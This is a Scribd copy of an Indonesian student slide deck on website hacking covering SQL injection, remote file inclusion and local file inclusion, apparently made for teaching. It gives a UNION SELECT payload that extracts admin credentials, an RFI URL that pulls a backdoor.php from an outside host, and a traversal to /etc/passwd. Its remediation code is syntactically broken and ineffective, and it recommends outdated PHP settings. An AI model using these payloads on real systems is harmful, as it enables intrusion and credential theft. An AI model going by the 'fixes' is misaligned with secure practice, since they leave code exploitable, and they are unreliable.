Scribd Logo
Unggah

Selamat datang di Scribd!

  • Penetrasi Website

    Diunggah oleh

    Dsky MC
    90 tayangan20 halaman

    Hak Cipta

    © Attribution Non-Commercial (BY-NC)

    Format Tersedia

    PPTX, PDF, TXT atau baca online dari Scribd

    Apakah menurut Anda dokumen ini bermanfaat?

    Apakah konten ini tidak pantas?

    Laporkan Dokumen Ini

    Hak Cipta:

    Attribution Non-Commercial (BY-NC)
    Unduh sebagai PPTX, PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    90 tayangan20 halaman

    Penetrasi Website

    Diunggah oleh

    Dsky MC

    Hak Cipta:

    Attribution Non-Commercial (BY-NC)
    Unduh sebagai PPTX, PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    dari 20

    PENETRASI WEBSITE

    OLEH

    SAMUEL TANGON

    XII TKJ 6
    Biodata
    Nama : Samuel Tangon

    TTL : Manado, 17 Mei 1994

    Kelas : XII TKJ 6

    Sekolah : SMKN 3 Manado

    Hobby : Internet Hacking & Games


    Pengertian Penetrasi Website

    Penetrasi Website ( Web Hacking ) Adalah


    Suatu Tindakan Untuk Mencari Vulnerable
    atau Celah Keamanan Yang Ada Di Dalam
    Suatu Website.
    Tipe-Tipe Penetrasi Website
    SQL Injection ( Structured Query Language )

    RFI ( Remote File Inclusion )

    LFI ( Local File Inclusion )


    SQL Injection

    SQL Injection adalah suatu tindakan


    memanipulasi perintah SQL Database Yang
    Berada Di Dalam Server dengan
    memanfaatkan Celah dari Aplikasi Website.
    Bahaya SQL Injection
    SQL Injection memungkinkan penyerang dapat
    mengambil data-data yang ada di dalam database
    SQL dari Korban. Entah untuk keperluan legal
    maupun ilegal.
    Contoh SQL Injection
    Contoh Website Misalnya :
    http://localhost/index.php?p=1
    Jika dalam file index.php terkena vuln, kita dapat
    mencari file username dan password yang berada di
    database SQL dengan mengubah link berikut menjadi,

    http://localhost/index.php?p=1+union+select+0,1,2,conc
    at(username,0x3a,password),4+from+admins--
    RFI ( Remote File Inclusion )
    RFI adalah salah 1 teknik hacking yang
    memungkinkan penyerang dapat meng-include kan
    file yang ada di luar server.
    Bahaya RFI
    Bug RFI Sangat berbahaya karena penyerang / attacker
    dapat langsung meng-includekan file yang berupa
    backdoor / pintu belakang dari website.
    Contoh Penggunaan RFI
    Contoh Website Misalnya :
    http://www.7crew.co.cc/guestbook.php?page=welcome

     Penyerang dapat langsung meng-include / memasukan file


    backdoor / pintu belakang di dalam website, menjadi :
    http://www.7crew.co.cc/guestbook.php?page=http://evilscri
    pt.net/backdoor.php

    Dengan ini Penyerang dengan mudahnya memasukan file


    “backdoor.php” ke dalam website korban.
    LFI ( Local File Inclusion )
    Pengertian LFI hampir sama dengan RFI, tapi jika RFI
    memanggil file di luar server, LFI adalah suatu teknik
    hacking yang memungkinkan penyerang dapat
    memanggil file-file yang ada di website atau server
    korban.
    Bahaya LFI
    LFI sebenarnya tidak terlalu berbahaya, karena
    penyerang hanya bisa meng-include file yang ada di
    dalam server, melalui Link Website.
    Contoh Penggunaan LFI
    Contoh Website Misalnya
    http://www.anginribut.com/index.php?var=ribut.php
    ‘Jelas di link ini, file “ribut.php” adalah file yg di include
    dari server.”

    Jika kita rubah linknya menjadi


    http://www.anginribut.com/index.php?var=../../../../../..
    /../etc/
    passwd
    ‘Di link ini file ‘passwd’ dalam server linux di-includekan
    dan tentunya ini berbahaya.
    How To Fix ?
    Konfigurasi PHP Pada Server pada File php.ini

    Harus Mem-validasi Syntax yang kita gunakan.


    Konfigurasi Server pada php.ini
    Di Linux, Edit File di
    /etc/apache/php/php.ini
    Di Windows, Edit File di
    C:\xampp\php\php.ini

    Beberapa Line di Bawah Menjadi,

    allow_url_include = off
    allow_url_fopen = off
    magic_quotes_gpc = on
    Validasi Syntax SQL
     Misalnya Dalam File guestbook.php berisi,

    <?php
    $id = $_GET['id'];
    $result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
    ?>

    Dapat Dilihat Variable “$id” tidak di filter, dengan mudahnya syntax SQL dapat di Injeksi.

     Perbaiki dengan menambahkan fungsi “interval” atau “int” di syntax. Menjadi,


    <?php
    $id = $_GET['id'];
    $result = mysql_query( "SELECT name FROM members WHERE id = '$id=(int)$_GET['id']’”;
    ?>
    Validasi Syntax RFI
     Misalnya Dalam File bukutamu.php berisi,

    <?php
    $pagina=$_GET['pagina'];
    include $pagina;
    ?>

     Dapat ditambahkan “./” sebelum variable $_GET agar setiap file yang di include di luar
    server, akan ditambahkan “./” pada setiap link. Ubah Menjadi,

    <?php
    $pagina=“./”$_GET[‘pagina’];
    include $pagina;
    ?>
    Validasi Syntax LFI
     Misalnya dalam File index.php berisi,

    <?php
    $pagina=$_GET['pagina'];
    include '/pages/'.$pagina;
    ?>

     Sama Seperti pencegahan Bug RFI, ditambahkan variable “./” sebelum variable $_GET .
    Ubah Menjadi,

    <?php
    $pagina=“./”$_GET[‘pagina’];
    include ‘/pages/’.$pagina;
    ?>
    Kesimpulan
    Dari Materi tersebut dapat ditarik kesimpulan,

    1. Perlu Diperhatikan Konfigurasi server yang


    digunakan.

    2. Untuk setiap Programmer, perlu diperhatikan setiap


    syntax yang digunakan agar setiap script tidak ada
    yang terkena Bug.
    TERIMA KASIH

    Sumber :

    ManadoCoding Community : http://www.manadocoding.org

    7Crew Community : http://7crew.co.cc

    Inj3ct0r : http://1337db.com

    Exploit-DB : http://www.exploit-db.com

    Some From Google :P

    Anda mungkin juga menyukai